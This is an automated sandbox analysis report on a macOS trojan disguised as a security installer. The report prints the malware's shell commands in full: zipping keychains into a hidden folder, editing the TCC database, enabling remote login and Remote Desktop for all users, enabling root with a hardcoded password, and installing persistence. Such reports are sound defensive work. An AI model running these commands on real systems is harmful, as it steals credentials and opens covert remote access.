Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:23.0.0
Analysis ID:57793
Start time:16:35:16
Joe Sandbox Product:Cloud
Start date:26.07.2018
Overall analysis duration:0h 13m 34s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:FmTmHujm4o (renamed file extension from none to dmg)
Cookbook file name:defaultmacfilecookbook.jbs
Analysis system description:Mac Mini, High Sierra 10.13.2 (MS Office 16.9, Java 1.8.0_25)
Detection:MAL
Classification:mal100.troj.spyw.expl.macDMG@0/33@1/0
Warnings:
Show All
  • Report size exceeded maximum capacity and may have missing behavior information.

Detection

StrategyScoreRangeReportingDetection
Threshold1000 - 100Report FP / FNmalicious

Classification

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Imports the Security library (often used for certificate, key, keychain, or secure transport handling)Show sources
Source: initial sampleStatic MACH information: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security

Networking:

barindex
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: mesu.g.aaplimg.com
Urls found in memory or binary dataShow sources
Source: FmTmHujm4o.dmgString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49263
Source: unknownNetwork traffic detected: HTTP traffic on port 49263 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Enables system access through Apple's Remote Desktop Sharing for all usersShow sources
Source: /usr/bin/sudo (PID: 546)Apple Remote Desktop kickstart all users: /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -> /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -off -restart -agent -privs -all -allowAccessFor -allUsersJump to behavior
Explicitly disables computer sleep within the System Preferences (may be set for surreptitious remote desktop access)Show sources
Source: /usr/bin/sudo (PID: 672)Systemsetup executable: /usr/sbin/systemsetup -> systemsetup -setcomputersleep NeverJump to behavior
Explicitly enables remote login within the System PreferencesShow sources
Source: /usr/bin/sudo (PID: 543)Systemsetup executable: /usr/sbin/systemsetup -> systemsetup -setremotelogin onJump to behavior
Uses kickstart to modify Apple's Remote Desktop settingsShow sources
Source: /usr/bin/sudo (PID: 546)Apple Remote Desktop kickstart: /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -> /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -off -restart -agent -privs -all -allowAccessFor -allUsersJump to behavior

System Summary:

barindex
Classification labelShow sources
Source: classification engineClassification label: mal100.troj.spyw.expl.macDMG@0/33@1/0

Data Obfuscation:

barindex
Imports the Security library (often used for certificate, key, keychain, or secure transport handling)Show sources
Source: initial sampleStatic MACH information: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security

Persistence and Installation Behavior:

barindex
Executes the "sudo" command used to execute a command as another userShow sources
Source: /bin/bash (PID: 536)Sudo executable: /usr/bin/sudo -> sudo -S zip -r /Users/henry/.calisto/KC.zip /Users/henry/Library/Keychains/ /Library/Keychains/Jump to behavior
Source: /bin/bash (PID: 540)Sudo executable: /usr/bin/sudo -> sudo /usr/bin/sqlite3 /Library/Application Support/com.apple.TCC/TCC.db INSERT or REPLACE INTO access VALUES('kTCCServiceAccessibility','com.intego.Mac-Internet-Security-X9-Installer',0,1,1,NULL,NULL)Jump to behavior
Source: /bin/bash (PID: 542)Sudo executable: /usr/bin/sudo -> sudo systemsetup -setremotelogin onJump to behavior
Source: /bin/bash (PID: 545)Sudo executable: /usr/bin/sudo -> sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -off -restart -agent -privs -all -allowAccessFor -allUsersJump to behavior
Source: /bin/bash (PID: 671)Sudo executable: /usr/bin/sudo -> sudo systemsetup -setcomputersleep NeverJump to behavior
Source: /bin/bash (PID: 673)Sudo executable: /usr/bin/sudo -> sudo cp -R /Volumes/Mac Internet Security X9/Mac Internet Security X9 Installer.app /System/Library/CoreServices/launchb.appJump to behavior
Source: /bin/bash (PID: 675)Sudo executable: /usr/bin/sudo -> sudo mv /System/Library/CoreServices/launchb.app/Contents/MacOS/Mac Internet Security X9 Installer /System/Library/CoreServices/launchb.app/Contents/MacOS/launchbJump to behavior
Source: /bin/bash (PID: 677)Sudo executable: /usr/bin/sudo -> sudo cp -f /System/Library/CoreServices/launchb.app/Contents/Resources/InfoL.plist /System/Library/CoreServices/launchb.app/Contents/Info.plistJump to behavior
Source: /bin/bash (PID: 679)Sudo executable: /usr/bin/sudo -> sudo cp -f /System/Library/CoreServices/launchb.app/Contents/Resources/com.intego.Mac-Internet-Security-X9-Installer.plist /Library/LaunchAgents/com.intego.Mac-Internet-Security-X9-Installer.plistJump to behavior
Many shell processes execute programs via execve syscall (may be indicative for malicious behavior)Show sources
Source: /bin/sh (PID: 548)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -list /Local/Target/UsersJump to behavior
Source: /bin/sh (PID: 549)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_amavisd uidJump to behavior
Source: /bin/sh (PID: 550)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_analyticsd uidJump to behavior
Source: /bin/sh (PID: 551)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appleevents uidJump to behavior
Source: /bin/sh (PID: 552)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_applepay uidJump to behavior
Source: /bin/sh (PID: 553)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appowner uidJump to behavior
Source: /bin/sh (PID: 554)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appserver uidJump to behavior
Source: /bin/sh (PID: 555)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appstore uidJump to behavior
Source: /bin/sh (PID: 556)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ard uidJump to behavior
Source: /bin/sh (PID: 557)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_assetcache uidJump to behavior
Source: /bin/sh (PID: 558)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_astris uidJump to behavior
Source: /bin/sh (PID: 559)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_atsserver uidJump to behavior
Source: /bin/sh (PID: 560)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_avbdeviced uidJump to behavior
Source: /bin/sh (PID: 561)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_calendar uidJump to behavior
Source: /bin/sh (PID: 562)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_captiveagent uidJump to behavior
Source: /bin/sh (PID: 563)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ces uidJump to behavior
Source: /bin/sh (PID: 564)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_clamav uidJump to behavior
Source: /bin/sh (PID: 565)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cmiodalassistants uidJump to behavior
Source: /bin/sh (PID: 566)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_coreaudiod uidJump to behavior
Source: /bin/sh (PID: 567)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_coremediaiod uidJump to behavior
Source: /bin/sh (PID: 568)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ctkd uidJump to behavior
Source: /bin/sh (PID: 569)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cvmsroot uidJump to behavior
Source: /bin/sh (PID: 570)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cvs uidJump to behavior
Source: /bin/sh (PID: 571)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cyrus uidJump to behavior
Source: /bin/sh (PID: 572)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_datadetectors uidJump to behavior
Source: /bin/sh (PID: 573)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_devdocs uidJump to behavior
Source: /bin/sh (PID: 574)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_devicemgr uidJump to behavior
Source: /bin/sh (PID: 575)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_displaypolicyd uidJump to behavior
Source: /bin/sh (PID: 576)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_distnote uidJump to behavior
Source: /bin/sh (PID: 577)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dovecot uidJump to behavior
Source: /bin/sh (PID: 578)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dovenull uidJump to behavior
Source: /bin/sh (PID: 579)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dpaudio uidJump to behavior
Source: /bin/sh (PID: 580)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_eppc uidJump to behavior
Source: /bin/sh (PID: 581)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_findmydevice uidJump to behavior
Source: /bin/sh (PID: 582)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_fpsd uidJump to behavior
Source: /bin/sh (PID: 583)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ftp uidJump to behavior
Source: /bin/sh (PID: 584)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_gamecontrollerd uidJump to behavior
Source: /bin/sh (PID: 585)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_geod uidJump to behavior
Source: /bin/sh (PID: 586)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_hidd uidJump to behavior
Source: /bin/sh (PID: 587)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_iconservices uidJump to behavior
Source: /bin/sh (PID: 588)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_installassistant uidJump to behavior
Source: /bin/sh (PID: 589)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_installer uidJump to behavior
Source: /bin/sh (PID: 590)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_jabber uidJump to behavior
Source: /bin/sh (PID: 591)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_kadmin_admin uidJump to behavior
Source: /bin/sh (PID: 592)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_kadmin_changepw uidJump to behavior
Source: /bin/sh (PID: 593)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_anonymous uidJump to behavior
Source: /bin/sh (PID: 594)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_changepw uidJump to behavior
Source: /bin/sh (PID: 595)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_kadmin uidJump to behavior
Source: /bin/sh (PID: 596)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_kerberos uidJump to behavior
Source: /bin/sh (PID: 597)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_krbtgt uidJump to behavior
Source: /bin/sh (PID: 598)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krbfast uidJump to behavior
Source: /bin/sh (PID: 599)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krbtgt uidJump to behavior
Source: /bin/sh (PID: 600)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_launchservicesd uidJump to behavior
Source: /bin/sh (PID: 601)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_lda uidJump to behavior
Source: /bin/sh (PID: 602)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_locationd uidJump to behavior
Source: /bin/sh (PID: 603)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_lp uidJump to behavior
Source: /bin/sh (PID: 604)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mailman uidJump to behavior
Source: /bin/sh (PID: 605)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mbsetupuser uidJump to behavior
Source: /bin/sh (PID: 606)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mcxalr uidJump to behavior
Source: /bin/sh (PID: 607)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mdnsresponder uidJump to behavior
Source: /bin/sh (PID: 608)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mobileasset uidJump to behavior
Source: /bin/sh (PID: 609)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mysql uidJump to behavior
Source: /bin/sh (PID: 610)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_netbios uidJump to behavior
Source: /bin/sh (PID: 611)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_netstatistics uidJump to behavior
Source: /bin/sh (PID: 612)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_networkd uidJump to behavior
Source: /bin/sh (PID: 613)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_nsurlsessiond uidJump to behavior
Source: /bin/sh (PID: 614)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_nsurlstoraged uidJump to behavior
Source: /bin/sh (PID: 615)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ondemand uidJump to behavior
Source: /bin/sh (PID: 616)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_postfix uidJump to behavior
Source: /bin/sh (PID: 617)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_postgres uidJump to behavior
Source: /bin/sh (PID: 618)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_qtss uidJump to behavior
Source: /bin/sh (PID: 619)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_sandbox uidJump to behavior
Source: /bin/sh (PID: 620)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_screensaver uidJump to behavior
Source: /bin/sh (PID: 621)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_scsd uidJump to behavior
Source: /bin/sh (PID: 622)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_securityagent uidJump to behavior
Source: /bin/sh (PID: 623)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_serialnumberd uidJump to behavior
Source: /bin/sh (PID: 624)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_softwareupdate uidJump to behavior
Source: /bin/sh (PID: 625)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_spotlight uidJump to behavior
Source: /bin/sh (PID: 626)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_sshd uidJump to behavior
Source: /bin/sh (PID: 627)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_svn uidJump to behavior
Source: /bin/sh (PID: 628)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_taskgated uidJump to behavior
Source: /bin/sh (PID: 629)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_teamsserver uidJump to behavior
Source: /bin/sh (PID: 630)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_timed uidJump to behavior
Source: /bin/sh (PID: 631)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_timezone uidJump to behavior
Source: /bin/sh (PID: 632)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_tokend uidJump to behavior
Source: /bin/sh (PID: 633)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_trustevaluationagent uidJump to behavior
Source: /bin/sh (PID: 634)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_unknown uidJump to behavior
Source: /bin/sh (PID: 635)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_update_sharing uidJump to behavior
Source: /bin/sh (PID: 636)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_usbmuxd uidJump to behavior
Source: /bin/sh (PID: 637)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_uucp uidJump to behavior
Source: /bin/sh (PID: 638)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_warmd uidJump to behavior
Source: /bin/sh (PID: 639)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_webauthserver uidJump to behavior
Source: /bin/sh (PID: 640)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_windowserver uidJump to behavior
Source: /bin/sh (PID: 641)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_www uidJump to behavior
Source: /bin/sh (PID: 642)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_wwwproxy uidJump to behavior
Source: /bin/sh (PID: 643)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_xcsbuildagent uidJump to behavior
Source: /bin/sh (PID: 644)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_xcscredserver uidJump to behavior
Source: /bin/sh (PID: 645)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_xserverdocs uidJump to behavior
Source: /bin/sh (PID: 646)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/henry uidJump to behavior
Source: /bin/sh (PID: 649)Shell process: /bin/launchctl list com.apple.screensharingJump to behavior
Source: /bin/sh (PID: 666)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/henry naprivsJump to behavior
Source: /bin/sh (PID: 667)Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -create /Local/Target/Users/henry naprivs 1073742079Jump to behavior
Changes permissions of written Mach-O filesShow sources
Source: /bin/cp (PID: 674)Permissions modified for written 64-bit Mach-O /System/Library/CoreServices/launchb.app/Contents/Frameworks/Alamofire.framework/Versions/A/Alamofire: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /bin/cp (PID: 674)Permissions modified for written 64-bit Mach-O /System/Library/CoreServices/launchb.app/Contents/Frameworks/CryptoSwift.framework/Versions/A/CryptoSwift: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /bin/cp (PID: 674)Permissions modified for written 64-bit Mach-O /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftAppKit.dylib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /bin/cp (PID: 674)Permissions modified for written 64-bit Mach-O /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCore.dylib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /bin/cp (PID: 674)Permissions modified for written 64-bit Mach-O /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCoreData.dylib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /bin/cp (PID: 674)Permissions modified for written 64-bit Mach-O /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCoreGraphics.dylib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /bin/cp (PID: 674)Permissions modified for written 64-bit Mach-O /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCoreImage.dylib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /bin/cp (PID: 674)Permissions modified for written 64-bit Mach-O /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftDarwin.dylib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /bin/cp (PID: 674)Permissions modified for written 64-bit Mach-O /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftDispatch.dylib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /bin/cp (PID: 674)Permissions modified for written 64-bit Mach-O /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftFoundation.dylib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /bin/cp (PID: 674)Permissions modified for written 64-bit Mach-O /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftObjectiveC.dylib: bits: - usr: rx grp: rx all: rwxJump to dropped file
Source: /bin/cp (PID: 674)Permissions modified for written 64-bit Mach-O /System/Library/CoreServices/launchb.app/Contents/MacOS/Mac Internet Security X9 Installer: bits: - usr: rx grp: rx all: rwxJump to dropped file
Creates application bundlesShow sources
Source: /bin/cp (PID: 674)Bundle Info.plist file created: /System/Library/CoreServices/launchb.app/Contents/Info.plistJump to behavior
Creates hidden files, links and/or directoriesShow sources
Source: /bin/mkdir (PID: 533)Hidden Directory created: /Users/henry/.calisto/ -> /Users/henry/.calisto/Jump to behavior
Executes commands using a shell command-line interpreterShow sources
Source: /Volumes/Mac Internet Security X9/Mac Internet Security X9 Installer.app/Contents/MacOS/Mac Internet Security X9 Installer (PID: 529)Shell command executed: /bin/bash -c mkdir ~/.calisto/Jump to behavior
Source: /Volumes/Mac Internet Security X9/Mac Internet Security X9 Installer.app/Contents/MacOS/Mac Internet Security X9 Installer (PID: 529)Shell command executed: /bin/bash -c echo | sudo -S zip -r ~/.calisto/KC.zip ~/Library/Keychains/ /Library/Keychains/ && ifconfig > ~/.calisto/network.dat && echo henry > ~/.calisto/cred.dat && zip -r ~/.calisto/calisto.zip ~/.calisto/ && sudo /usr/bin/sqlite3 /Library/Application\ Support/com.apple.TCC/TCC.db 'INSERT or REPLACE INTO access VALUES('kTCCServiceAccessibility','com.intego.Mac-Internet-Security-X9-Installer',0,1,1,NULL,NULL) ' && sudo systemsetup -setremotelogin on && sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -off -restart -agent -privs -all -allowAccessFor -allUsers && dsenableroot -p -r aGNOStIC7890!!! && sudo systemsetup -setcomputersleep Never && sudo cp -R /Volumes/Mac\ Internet\ Security\ X9/Mac\ Internet\ Security\ X9\ Installer.app /System/Library/CoreServices/launchb.app && sudo mv /System/Library/CoreServices/launchb.app/Contents/MacOS/Mac\ Internet\ Security\ X9\ Installer /System/Library/CoreServices/launchb.app/Contents/MJump to behavior
Source: /usr/bin/perl5.18 (PID: 548)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -list /Local/Target/UsersJump to behavior
Source: /usr/bin/perl5.18 (PID: 549)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_amavisd' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 550)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_analyticsd' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 551)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_appleevents' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 552)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_applepay' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 553)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_appowner' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 554)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_appserver' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 555)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_appstore' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 556)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_ard' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 557)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_assetcache' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 558)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_astris' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 559)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_atsserver' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 560)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_avbdeviced' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 561)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_calendar' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 562)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_captiveagent' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 563)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_ces' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 564)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_clamav' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 565)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_cmiodalassistants' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 566)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_coreaudiod' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 567)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_coremediaiod' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 568)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_ctkd' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 569)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_cvmsroot' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 570)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_cvs' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 571)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_cyrus' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 572)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_datadetectors' uidJump to behavior
